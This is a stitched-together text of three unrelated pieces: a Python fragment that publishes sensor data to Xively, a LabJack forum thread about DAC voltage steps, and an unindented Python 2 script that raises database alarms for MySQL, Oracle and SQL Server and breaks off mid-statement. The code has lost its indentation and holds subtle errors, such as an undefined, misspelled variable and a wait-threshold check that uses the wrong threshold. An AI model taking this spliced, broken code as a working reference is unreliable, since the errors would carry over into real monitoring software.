if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
xivelyApiKey = settings['xivelyApiKey']
# update status
if xivelyApiKey==None:
with self.statusLock:
self.status['apiKeySet'] = 'NO'
else:
with self.statusLock:
self.status['apiKeySet'] = 'YES'
# decide whether to connect/disconnect
if (not self.connector) and xivelyApiKey:
# connect
# log
log.info("Connecting to Xively")
# remember API key
self.xivelyApiKey = xivelyApiKey
# connect
try:
self.connector = xivelyConnector.xivelyConnector(
apiKey = self.xivelyApiKey,
productName = 'SmartMesh IP Starter Kit',
productDesc = 'Connecting using DustLink',
)
except Exception as err:
# log
log.error("Error while connecting to Xively: {0}".format(err))
# update status
with self.statusLock:
self.status['status'] = 'CONNECTION FAILED'
self.status['numConnectionsFailed']+= 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['status'] = 'CONNECTED'
self.status['numConnectionsOK'] += 1
self.status['lastConnected'] = dld.timestampToStringShort(now)
elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
# disconnect
self._disconnect()
#========== publish data
if self.connector:
try:
self.connector.publish(
mac = data['mac'],
datastream = data['type'],
value = data['lastvalue'],
)
except Exception as err:
# log
log.error(
"Error while publishing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
data['type'],
err,
)
)
# update status
with self.statusLock:
self.status['numPublishedFail'] += 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['numPublishedOK'] += 1
#========== subscribe
if self.connector:
if mac not in self.subscribedMotes:
try:
if ('subscribeToLed' in data) and (data['subscribeToLed']):
# create datastream
self.connector.publish(
mac = mac,
datastream = 'led',
value = 0,
)
# subscribe
self.connector.subscribe(
mac = mac,
datastream = 'led',
callback = self._led_cb,
)
except Exception as err:
# log
log.error(
"Error while subscribing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
'led',
err,
)
)
# update status
with self.statusLock:
self.status['status'] = 'SUBSCRIPTION FAILED'
self.status['numSubscriptionsFailed'] += 1
# disconnect
self._disconnect()
else:
self.subscribedMotes += [mac]
def _disconnect(self):
now = time.time()
dld = DustLinkData.DustLinkData()
# log
log.info("Disconnecting from Xively")
# close connector
try:
self.connector.close()
except Exception:
pass # happens when no active subscription
# reset variables
self.connector = None
self.xivelyApiKey = None
self.subscribedMotes = []
# update status
with self.statusLock:
self.status['status'] = 'DISCONNECTED'
self.status['lastDisconnected'] = dld.timestampToStringShort(now)
def _led_cb(self,mac,datastream,value):
# all non-0 values turn LED on
if value==0:
value = 0
else:
value = 1
dispatcher.send(
signal = 'fieldsToMesh_OAPLED',
data = {
'mac': mac,
'fields': {
'status': value,
},
}
)
|
LJ_chDAC_BINARY //If set nonzero put_dac values should be 0-65535.
//Set DAC0 to 2.5 volts.
The LJ_ioPUT_DAC seems to program an 8-bit voltage but the device has a 10-bit dac. Is there a different iotype for 10-bit commands?
You mean that you are seeing 20 mV steps? Make sure you have a current UD driver and U3 firmware. Go to the "config defaults" section of LJControlPanel and make sure 8-bit DAC mode is not selected.
Yes. I see 20mV rather then the 5mV expected. The firmware is 1.32 appears to be up to date. The driver is 3.15, seems to be up to date too. (I was not able to run 3.24 for some reason). The 8-bit mode is not selected.
What sort of problem do you have with the 3.24 installer? I would tackle that so you are using a current driver before you do much more troubleshooting. Perhaps post a comment on that page with the problem.
After we get your driver updated, can you test the DACs using the test panel in LJControlPanel, if that is not what you are doing already?
Also, confirm that LJCP reports hardware version 1.30 for your U3.
When I send 5.0 to my U6 I get 0v out. I have had to cap at 4.9 to ensure an output voltage.
Do your DAC troubleshooting with no load on the DAC. Do you see this using the test panel in LJControlPanel? How are you measuring the voltage output?
I am using a U6 device.
Can the value of the Analog Output be read back?
|
#!/bin/env python
#-*-coding:utf-8-*-
import os
import sys
import string
import time
import datetime
import MySQLdb
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
path='./include'
sys.path.insert(0,path)
import functions as func
import sendmail
import sendsms_fx
import sendsms_api
send_mail_max_count = func.get_option('send_mail_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
mail_to_list_common = func.get_option('send_mail_to_list')
send_sms_max_count = func.get_option('send_sms_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
sms_to_list_common = func.get_option('send_sms_to_list')
def get_alarm_mysql_status():
sql="select a.server_id,a.connect,a.threads_connected,a.threads_running,a.threads_waits,a.create_time,a.host,a.port,b.alarm_threads_connected,b.alarm_threads_running,alarm_threads_waits,b.threshold_warning_threads_connected,b.threshold_critical_threads_connected,b.threshold_warning_threads_running,b.threshold_critical_threads_running,threshold_warning_threads_waits,threshold_critical_threads_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_status a, db_cfg_mysql b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
threads_connected=line[2]
threads_running=line[3]
threads_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_threads_connected=line[8]
alarm_threads_running=line[9]
alarm_threads_waits=line[10]
threshold_warning_threads_connected=line[11]
threshold_critical_threads_connected=line[12]
threshold_warning_threads_running=line[13]
threshold_critical_threads_running=line[14]
threshold_warning_threads_waits=line[15]
threshold_critical_threads_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mysql server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mysql server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_threads_connected)==1:
if int(threads_connected)>=int(threshold_critical_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'critical','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'threads_connected',threads_connected,'critical')
elif int(threads_connected)>=int(threshold_warning_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'warning','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'threads_connected',threads_connected,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'threads_connected',threads_connected,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'threads connected ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_running)==1:
if int(threads_running)>=int(threshold_critical_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'critical','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'threads_running',threads_running,'critical')
elif int(threads_running)>=int(threshold_warning_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'warning','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'threads_running',threads_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'threads_running',threads_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'threads running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_waits)==1:
if int(threads_waits)>=int(threshold_critical_threads_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'critical','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'threads_waits',threads_waits,'critical')
elif int(threads_waits)>=int(threshold_warning_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'warning','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'threads_waits',threads_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'threads_waits',threads_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'threads waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_mysql_replcation():
sql = "select a.server_id,a.slave_io_run,a.slave_sql_run,a.delay,a.create_time,b.host,b.port,b.alarm_repl_status,b.alarm_repl_delay,b.threshold_warning_repl_delay,b.threshold_critical_repl_delay,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_dr_s a, db_cfg_mysql b where a.server_id=b.id and a.is_slave='1';"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
slave_io_run=line[1]
slave_sql_run=line[2]
delay=line[3]
create_time=line[4]
host=line[5]
port=line[6]
alarm_repl_status=line[7]
alarm_repl_delay=line[8]
threshold_warning_repl_delay=line[9]
threshold_critical_repl_delay=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_repl_status)==1:
if (slave_io_run== "Yes") and (slave_sql_run== "Yes"):
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'ok')
if int(alarm_repl_delay)==1:
if int(delay)>=int(threshold_critical_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'critical','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',delay,'critical')
elif int(delay)>=int(threshold_warning_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'warning','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',2,host,port,create_time,'repl_delay',delay,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',delay,'ok')
else:
send_mail = func.update_send_mail_status(server_id,db_type,'replication',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'replication',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical','replication stop',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',3,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
pass
def get_alarm_oracle_status():
sql = """SELECT a.server_id,
a.connect,
a.session_total,
a.session_actives,
a.session_waits,
CONVERT(a.flashback_space_used, DECIMAL(10,2)) as flashback_space_used,
a.database_role,
a.dg_stats,
a.dg_delay,
a.create_time,
b.HOST,
b.PORT,
b.alarm_session_total,
b.alarm_session_actives,
b.alarm_session_waits,
b.alarm_fb_space,
b.threshold_warning_session_total,
b.threshold_critical_session_total,
b.threshold_warning_session_actives,
b.threshold_critical_session_actives,
b.threshold_warning_session_waits,
b.threshold_critical_session_waits,
b.threshold_warning_fb_space,
b.threshold_critical_fb_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_status a, db_cfg_oracle b
WHERE a.server_id = b.id """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
session_total=line[2]
session_actives=line[3]
session_waits=line[4]
flashback_space_used=line[5]
database_role=line[6]
mrp_status=line[7]
dg_delay=line[8]
create_time=line[9]
host=line[10]
port=line[11]
alarm_session_total=line[12]
alarm_session_actives=line[13]
alarm_session_waits=line[14]
alarm_fb_space=line[15]
threshold_warning_session_total=line[16]
threshold_critical_session_total=line[17]
threshold_warning_session_actives=line[18]
threshold_critical_session_actives=line[19]
threshold_warning_session_waits=line[20]
threshold_critical_session_waits=line[21]
threshold_warning_fb_space=line[22]
threshold_critical_fb_space=line[23]
send_mail=line[24]
send_mail_to_list=line[25]
send_sms=line[26]
send_sms_to_list=line[27]
tags=line[28]
db_type=line[29]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','oracle server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','oracle server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_session_total)==1:
if int(session_total) >= int(threshold_critical_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'critical','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'session_total',session_total,'critical')
elif int(session_total) >= int(threshold_warning_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'warning','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'session_total',session_total,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'session_total',session_total,'ok')
if int(alarm_session_actives)==1:
if int(session_actives) >= int(threshold_critical_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'critical','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'session_actives',session_actives,'critical')
elif int(session_actives) >= int(threshold_warning_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'warning','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'session_actives',session_actives,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'active sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'session_actives',session_actives,'ok')
if int(alarm_session_waits)==1:
if int(session_waits) >= int(threshold_critical_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'critical','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'session_waits',session_waits,'critical')
elif int(session_waits) >= int(threshold_warning_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'warning','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'session_waits',session_waits,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'waits sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'session_waits',session_waits,'ok')
if int(alarm_fb_space)==1:
if int(flashback_space_used) >= int(threshold_critical_fb_space):
send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'critical','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'flashback_space_used',flashback_space_used,'critical')
elif int(flashback_space_used) >= int(threshold_warning_fb_space):
send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'warning','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',2,host,port,create_time,'flashback_space_used',flashback_space_used,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'flashback space ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',1,host,port,create_time,'flashback_space_used',flashback_space_used,'ok')
if database_role=="PHYSICAL STANDBY":
if int(dg_delay) >= 3600*3 or int(mrp_status) < 1:
if int(dg_delay) >= 3600*3:
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'warning','replication delay more than 3 hours',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',dg_delay,'warning')
if int(mrp_status) < 1:
send_mail = func.update_send_mail_status(server_id,db_type,'mrp_status',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'mrp_status',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'mrp_status',mrp_status,'warning','MRP process is down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',2,host,port,create_time,'mrp_status',mrp_status,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl',mrp_status,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'repl',mrp_status,'ok')
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',dg_delay,'ok')
else:
pass
def get_alarm_sqlserver_status():
sql="select a.server_id,a.connect,a.processes,a.processes_running,a.processes_waits,a.create_time,a.host,a.port,b.alarm_processes,b.alarm_processes_running,alarm_processes_waits,b.threshold_warning_processes,b.threshold_warning_processes_running,b.threshold_warning_processes_waits,b.threshold_critical_processes,threshold_critical_processes_running,threshold_critical_processes_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'sqlserver' as db_type from sqlserver_status a, db_cfg_sqlserver b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
processes=line[2]
processes_running=line[3]
processes_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_processes=line[8]
alarm_processes_running=line[9]
alarm_processes_waits=line[10]
threshold_warning_processes=line[11]
threshold_warning_processes_running=line[12]
threshold_warning_processes_waits=line[13]
threshold_critical_processes=line[14]
threshold_critical_processes_running=line[15]
threshold_critical_processes_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','sqlserver server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','sqlserver server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_processes)==1:
if int(processes)>=int(threshold_critical_processes):
send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'critical','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'processes',processes,'critical')
elif int(processes)>=int(threshold_warning_processes):
send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'warning','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'processes',processes,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'processes',processes,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes',processes,'processes ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_running)==1:
if int(processes_running)>=int(threshold_critical_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_runnging,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'processes_running',processes_running,'critical')
elif int(processes_running)>=int(threshold_warning_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'processes_running',processes_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'processes_running',processes_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'processes running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_waits)==1:
if int(processes_waits)>=int(threshold_critical_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'critical','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'processes_waits',processes_waits,'critical')
elif int(processes_waits)>=int(threshold_warning_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'warning','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'processes_waits',processes_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'processes_waits',processes_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'processes waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_oracle_tablespace():
sql = """SELECT a.server_id,
a.tablespace_name,
a.total_size,
a.used_size,
CONVERT(a.max_rate, DECIMAL(6,2)) as max_rate,
a.create_time,
b. HOST,
b. PORT,
b.alarm_tablespace,
b.threshold_warning_tablespace,
b.threshold_critical_tablespace,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_tablespace a, db_cfg_oracle b
WHERE a.server_id = b.id
ORDER BY max_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
tablespace_name=line[1]
total_size=line[2]
used_size=line[3]
max_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_tablespace=line[8]
threshold_warning_tablespace=line[9]
threshold_critical_tablespace=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_tablespace)==1:
if int(max_rate) >= int(threshold_critical_tablespace):
send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'critical','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',3,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'critical')
elif int(max_rate) >= int(threshold_warning_tablespace):
